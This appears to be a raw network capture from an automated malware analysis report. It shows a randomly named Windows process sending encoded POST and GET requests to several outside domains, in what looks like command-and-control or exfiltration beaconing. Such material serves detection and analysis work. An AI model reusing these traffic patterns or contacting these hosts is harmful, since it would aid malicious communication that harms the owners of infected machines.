                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
58 | 192.168.11.20 | 49790 | 199.192.19.19 | 80 | 1136 | C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 12:02:12.840765953 CEST | 704 | OUT | POST /44em/ HTTP/1.1
                                                                                                                                                    Host: www.stayvact.xyz
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 220
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.stayvact.xyz
                                                                                                                                                    Referer: http://www.stayvact.xyz/44em/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Ascii: PbG=vEmWqxsFEYFm0hRsxKyQaUBzdiWx4Em0Jg30uDXC+AkZmvC752NRcLyPtTyKpsJN/P/Timm7QrrjSPMDnyI34Hft6jV1LiGg9wRcXDeC4QSNF0OSO1/WwZLJ6snzHfR/nWfMFazWrREjnI33nkUZZzXmvkInyAYwdKzdL8hARqEG3KNqSgVIoV/tk1QGQz+Bcbx80QxRTriUU5MecFNLTG8=
Oct 4, 2024 12:02:13.048616886 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:02:12 GMT
                                                                                                                                                    Server: Apache
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    Content-Length: 16026
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Type: text/html


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
59 | 192.168.11.20 | 49791 | 199.192.19.19 | 80 | 1136 | C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 12:02:15.542889118 CEST | 5156 | OUT | POST /44em/ HTTP/1.1
                                                                                                                                                    Host: www.stayvact.xyz
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 6424
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.stayvact.xyz
                                                                                                                                                    Referer: http://www.stayvact.xyz/44em/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
Oct 4, 2024 12:02:15.750777960 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:02:15 GMT
                                                                                                                                                    Server: Apache
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    Content-Length: 16026
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Type: text/html


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
60 | 192.168.11.20 | 49792 | 199.192.19.19 | 80 | 1136 | C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 12:02:18.251822948 CEST | 426 | OUT | GET /44em/?PbG=iGO2pBA+GdZFzSp95ITiNE0UdXGz/GDPPTuDgRXb9x0A8cbI0BsffOr86U/ry5cw9/6dj1rDQbqcJPAE3iEy6ACI9UEhGVzT4hJYYQarhHeSOj2eWmeo6uY=&m2W4y=eLqP3zSpfDT HTTP/1.1
                                                                                                                                                    Host: www.stayvact.xyz
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
Oct 4, 2024 12:02:18.453294992 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:02:18 GMT
                                                                                                                                                    Server: Apache
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    Content-Length: 16026
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Data Ascii: x1="320.135" y1="132.746" x2="320.135" y2="153.952" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="310.194" y1="143.349" x2="330.075" y2="1
                                                                                                                                                    Oct 4, 2024 12:02:18.453648090 CEST1289INData Raw: 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 31 3d 22 34 38 39 2e 35 35 35 22 20 79 31 3d 22 32 39 39 2e 37 36 35 22 20 78 32 3d 22 34 38 39 2e 35 35 35 22 20 79 32 3d
                                                                                                                                                    Data Ascii: oke-miterlimit="10" x1="489.555" y1="299.765" x2="489.555" y2="308.124" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="485.636
                                                                                                                                                    Oct 4, 2024 12:02:18.453733921 CEST1289INData Raw: 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 31 3d 22 31 38 36 2e 33 35 39 22 20 79 31 3d 22 34 30 36 2e 39 36 37 22 20 78 32 3d 22 31 38 36 2e 33 35 39 22 20 79 32 3d 22 34 31 35 2e 33 32 36 22 20 2f 3e 0a 0a 20 20
                                                                                                                                                    Data Ascii: 10" x1="186.359" y1="406.967" x2="186.359" y2="415.326" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="190.277" y1="411.146" x
                                                                                                                                                    Oct 4, 2024 12:02:18.453746080 CEST1289INData Raw: 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69
                                                                                                                                                    Data Ascii: > <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="429.522" cy="201.185" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width=
                                                                                                                                                    Oct 4, 2024 12:02:18.453851938 CEST1289INData Raw: 79 3d 22 35 33 30 2e 39 32 33 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 31 33 30 2e 36 39 33 22 20 63 79 3d 22 33
                                                                                                                                                    Data Ascii: y="530.923" r="2.651" /> <circle fill="#0E0620" cx="130.693" cy="305.608" r="2.651" /> <circle fill="#0E0620" cx="480.296" cy="477.014" r="2.651" /> </g> </g> <g id="spacema
                                                                                                                                                    Oct 4, 2024 12:02:18.453954935 CEST1289INData Raw: 6d 69 74 3d 22 31 30 22 20 78 31 3d 22 33 32 33 2e 33 39 36 22 20 79 31 3d 22 32 33 36 2e 36 32 35 22 20 78 32 3d 22 32 39 35 2e 32 38 35 22 20 79 32 3d 22 33 35 33 2e 37 35 33 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63
                                                                                                                                                    Data Ascii: mit="10" x1="323.396" y1="236.625" x2="295.285" y2="353.753" /> <circle fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round" stroke-miterlimit="10" cx="323.666" cy="2
                                                                                                                                                    Oct 4, 2024 12:02:18.454082012 CEST1289INData Raw: 09 09 09 4d 33 30 31 2e 33 30 31 2c 33 34 37 2e 36 36 63 2d 31 2e 37 30 32 2c 30 2e 32 34 32 2d 35 2e 39 31 2c 31 2e 36 32 37 2d 37 2e 34 39 32 2c 32 2e 35 33 36 6c 2d 34 37 2e 39 36 35 2c 32 37 2e 33 30 31 63 2d 36 2e 36 36 34 2c 33 2e 38 32 39
                                                                                                                                                    Data Ascii: M301.301,347.66c-1.702,0.242-5.91,1.627-7.492,2.536l-47.965,27.301c-6.664,3.829-8.963,12.335-5.134,18.999h0c3.829,6.664,12.335,8.963,18.999,5.134l9.685-5.564" /> <path fill="#FFFFFF" stroke="#0E0620" stroke-width="3" s
                                                                                                                                                    Oct 4, 2024 12:02:18.638196945 CEST1289INData Raw: 36 39 2e 36 37 38 2c 33 39 34 2e 39 31 32 4c 32 36 39 2e 36 37 38 2c 33 39 34 2e 39 31 32 63 32 36 2e 33 2c 32 30 2e 36 34 33 2c 35 39 2e 36 35 34 2c 32 39 2e 35 38 35 2c 39 33 2e 31 30 36 2c 32 35 2e 37 32 34 6c 32 2e 34 31 39 2d 30 2e 31 31 34
                                                                                                                                                    Data Ascii: 69.678,394.912L269.678,394.912c26.3,20.643,59.654,29.585,93.106,25.724l2.419-0.114" /> </g> <g id="legs"> <g id="legR"> <path fill="#FFFFFF" stroke="#0E0620" stroke-width="3" strok


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
61 | 192.168.11.20 | 49793 | 13.248.169.48 | 80 | 1136 | C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 12:02:23.757869959 CEST | 702 | OUT | POST /9ned/ HTTP/1.1
                                                                                                                                                    Host: www.sleephygienist.org
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 200
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.sleephygienist.org
                                                                                                                                                    Referer: http://www.sleephygienist.org/9ned/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Ascii: PbG=w2hZiTIFO/Odzp0yGByg15Y+lLgqhb4cFCgG5TKQ+aE3xJJBiCO7Uqy6JJshbMIvpwe/iuYf5YL6YxAEpTozwLyR1ZYTrykb8ZqFhK97tMFbQyRx+NIsEp+wQ3TkqsZk2/zJ3yNLTC9J8x7TUna3qVgq8BDva+h21/UMIarwxr1W4LRtHioHk5xQ6dQvf4e6Zg==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
62 | 192.168.11.20 | 49794 | 13.248.169.48 | 80 | 1136 | C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 12:02:26.385068893 CEST | 722 | OUT | POST /9ned/ HTTP/1.1
                                                                                                                                                    Host: www.sleephygienist.org
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 220
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.sleephygienist.org
                                                                                                                                                    Referer: http://www.sleephygienist.org/9ned/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Ascii: PbG=w2hZiTIFO/OdyJEyEmOg95Y/57gqr750FCsG5X7d5ow3/M1BjDO7Xqy6Cps9DsIwpwCBiu0f5cj6YxQEplg0wbyXupYNlSkb8ZqFhLNdtMdbQChx8sIvFp+3AXTk58Zg2/zr32MQTA1J8wLTUzG0zlgsxhDhV+kc5dU/br7xwLkow9A3aQcjnqti+tpHd6fhEh7rjRuY2LGTf9s4eM03mU4=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
63 | 192.168.11.20 | 49795 | 13.248.169.48 | 80 | 1136 | C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 12:02:29.006437063 CEST | 2578 | OUT | POST /9ned/ HTTP/1.1
                                                                                                                                                    Host: www.sleephygienist.org
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 6424
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.sleephygienist.org
                                                                                                                                                    Referer: http://www.sleephygienist.org/9ned/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0


Session ID | Source IP | Source Port | Destination IP | Destination Port
64 | 192.168.11.20 | 49796 | 13.248.169.48 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 12:02:31.631722927 CEST | 432 | OUT | GET /9ned/?PbG=90J5hnkKMqWm95EdODHVgYU8jLlSuqUZOgFf/iPIyrVqxOp5uDPGdLjydK5bectxsy3BttRl3YyLMg8JhxE3vKKk0eEfvV9KpYS9gdBpjJtDcC1yxudRBLM=&m2W4y=eLqP3zSpfDT HTTP/1.1
                                                                                                                                                    Host: www.sleephygienist.org
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
Oct 4, 2024 12:02:31.734312057 CEST | 397 | IN | HTTP/1.1 200 OK
                                                                                                                                                    Server: openresty
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:02:31 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Content-Length: 257
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?PbG=90J5hnkKMqWm95EdODHVgYU8jLlSuqUZOgFf/iPIyrVqxOp5uDPGdLjydK5bectxsy3BttRl3YyLMg8JhxE3vKKk0eEfvV9KpYS9gdBpjJtDcC1yxudRBLM=&m2W4y=eLqP3zSpfDT"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
65 | 192.168.11.20 | 49797 | 43.252.167.188 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 12:02:37.062827110 CEST | 708 | OUT | POST /y6iz/ HTTP/1.1
                                                                                                                                                    Host: www.xn--fhq1c541j0zr.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 200
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.xn--fhq1c541j0zr.com
                                                                                                                                                    Referer: http://www.xn--fhq1c541j0zr.com/y6iz/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Ascii: PbG=+j4bOVi5jG9R7X9WfEM0P/dYF4oEaFcS9mqxW7UEOiIhLBHV/YlqfesyvRF20U1Ji5vT5JTldoSBSyJQWwccwW1Cm+XL3EpD/FESu95LWbnSOe8mQopkl/lMZt7/bb+8wlpEAeVCLM6MqKI1gKpNaT2O48BQVknlrCLkVsXOlEBkHNYdBUxIduUXwhUu7+HKUg==
Oct 4, 2024 12:02:37.373456955 CEST | 367 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:12:21 GMT
                                                                                                                                                    Server: Apache
                                                                                                                                                    Content-Length: 203
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /y6iz/ was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
66 | 192.168.11.20 | 49798 | 43.252.167.188 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 12:02:39.910324097 CEST | 728 | OUT | POST /y6iz/ HTTP/1.1
                                                                                                                                                    Host: www.xn--fhq1c541j0zr.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 220
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.xn--fhq1c541j0zr.com
                                                                                                                                                    Referer: http://www.xn--fhq1c541j0zr.com/y6iz/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Ascii: PbG=+j4bOVi5jG9R53NWdnU0YPdbbooEQlce9hixW55cNRshLh3VtJlqR+sy3BFzpk1Ci5jx5NXldsCBSwRQWj0fiW1AyOXFzEpD/FESu9tyWbPSPuMmRNdn5PlPet7/Q7+gwlpyAbxoLJmMqIA1u+dMPj2M88AXVn2TlS3gasHFlURtL7JHcmFse9Il0RtG58GRJp8QnlxrXj64GmCMKas3kLA=
Oct 4, 2024 12:02:40.228224039 CEST | 367 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:12:24 GMT
                                                                                                                                                    Server: Apache
                                                                                                                                                    Content-Length: 203
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /y6iz/ was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
67 | 192.168.11.20 | 49799 | 43.252.167.188 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 12:02:42.738281012 CEST | 2578 | OUT | POST /y6iz/ HTTP/1.1
                                                                                                                                                    Host: www.xn--fhq1c541j0zr.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 6424
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.xn--fhq1c541j0zr.com
                                                                                                                                                    Referer: http://www.xn--fhq1c541j0zr.com/y6iz/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
Data Ascii: PbG= [TRUNCATED]
Oct 4, 2024 12:02:42.738358021 CEST | 4355 | OUT |
                                                                                                                                                    Data Ascii: iDLYf7yXc3rWdki++gY0PfF2IXtIvW2+GppN3sh5+c9viaAwzTEdNm+vS61IKl/YdskAIg3AOHtGYQABwGl7jkqZxzmyDmDfQalsCFpzLbIQVZGnDFiZ0rvbi7GIERGmum74Y05PCuNrbsKGtmAxKyjkVBW/TtisfC4erzPTtEltaVzRE391HfuJXXr+jGNhQYxHbCfkpFwXyWET6/loJeheMcpkS8hixAqQQnjff3PqiOJ6Iaz
Oct 4, 2024 12:02:43.042527914 CEST | 367 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:12:27 GMT
                                                                                                                                                    Server: Apache
                                                                                                                                                    Content-Length: 203
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /y6iz/ was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
68 | 192.168.11.20 | 49800 | 43.252.167.188 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 12:02:45.572509050 CEST | 434 | OUT | GET /y6iz/?PbG=zhQ7Ngng1ztc3XJZIHU9Y/47AI96U2d0+kXKRZ9IAQQLMCXY95UFdstJ1SRqr3k6kIeJ8f3iCIfwSA0tHDQugE4jqofP6h0k5CYKv8JwRObuJO4PUIsN08g=&m2W4y=eLqP3zSpfDT HTTP/1.1
                                                                                                                                                    Host: www.xn--fhq1c541j0zr.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
Oct 4, 2024 12:02:45.882251024 CEST | 367 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:12:30 GMT
                                                                                                                                                    Server: Apache
                                                                                                                                                    Content-Length: 203
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /y6iz/ was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
69 | 192.168.11.20 | 49801 | 31.217.192.158 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 12:02:51.100986004 CEST | 693 | OUT | POST /h9tv/ HTTP/1.1
                                                                                                                                                    Host: www.jennarauten.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 200
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.jennarauten.com
                                                                                                                                                    Referer: http://www.jennarauten.com/h9tv/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Ascii: PbG=jaHEKjciMc7j1DSwB6Fcig09iHQCbZ0zpllBnC5xmYscJWBdc4xee5vgsbX1rO4tLP4aOQmiEFl6PSnBBTX9vbSoXi8S0ubN2QXX6SAglkMr7yvRoA+HRMc+DtuJ90QFTmzwzqQnOKxnYBVeXvgx3sRAcIPj07aFb7basqIEBMBxM50N9+U6LrHnYfeClL+Gwg==
Oct 4, 2024 12:02:51.900362015 CEST | 383 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                    Connection: close
                                                                                                                                                    x-powered-by: PHP/8.3.11
                                                                                                                                                    expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                    cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                                                    content-type: text/html; charset=UTF-8
                                                                                                                                                    x-redirect-by: WordPress - Really Simple Security
                                                                                                                                                    location: https://www.jennarauten.com/h9tv/
                                                                                                                                                    content-length: 0
                                                                                                                                                    date: Fri, 04 Oct 2024 10:02:02 GMT
                                                                                                                                                    server: LiteSpeed


Session ID | Source IP | Source Port | Destination IP | Destination Port
70 | 192.168.11.20 | 49802 | 31.217.192.158 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 12:02:53.830348015 CEST | 713 | OUT | POST /h9tv/ HTTP/1.1
                                                                                                                                                    Host: www.jennarauten.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 220
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.jennarauten.com
                                                                                                                                                    Referer: http://www.jennarauten.com/h9tv/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Ascii: PbG=jaHEKjciMc7jnTiwDbFcnA0+/3QCMJ03pl5BnHJhmq4cHWxdf5xeSZvgm7XsvO5hLPEkORaiEFx6PQPBUyX+tLSqeC8cwubN2QXX6SUOln8r6C/Rph+INcc9TNuJ50RMTmzSzrNAOI5nYEReX+gy9sQLYIOo47XLWobn9adaGvFPEPlXgMgeI4bVcvnqnJ/dttoE3SY1Gg1UBzsPyiDBsWg=
Oct 4, 2024 12:02:54.850675106 CEST | 383 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                    Connection: close
                                                                                                                                                    x-powered-by: PHP/8.3.11
                                                                                                                                                    expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                    cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                                                    content-type: text/html; charset=UTF-8
                                                                                                                                                    x-redirect-by: WordPress - Really Simple Security
                                                                                                                                                    location: https://www.jennarauten.com/h9tv/
                                                                                                                                                    content-length: 0
                                                                                                                                                    date: Fri, 04 Oct 2024 10:02:05 GMT
                                                                                                                                                    server: LiteSpeed


Session ID | Source IP | Source Port | Destination IP | Destination Port
71 | 192.168.11.20 | 49803 | 31.217.192.158 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 12:02:56.550652981 CEST | 1289 | OUT | POST /h9tv/ HTTP/1.1
                                                                                                                                                    Host: www.jennarauten.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 6424
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.jennarauten.com
                                                                                                                                                    Referer: http://www.jennarauten.com/h9tv/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
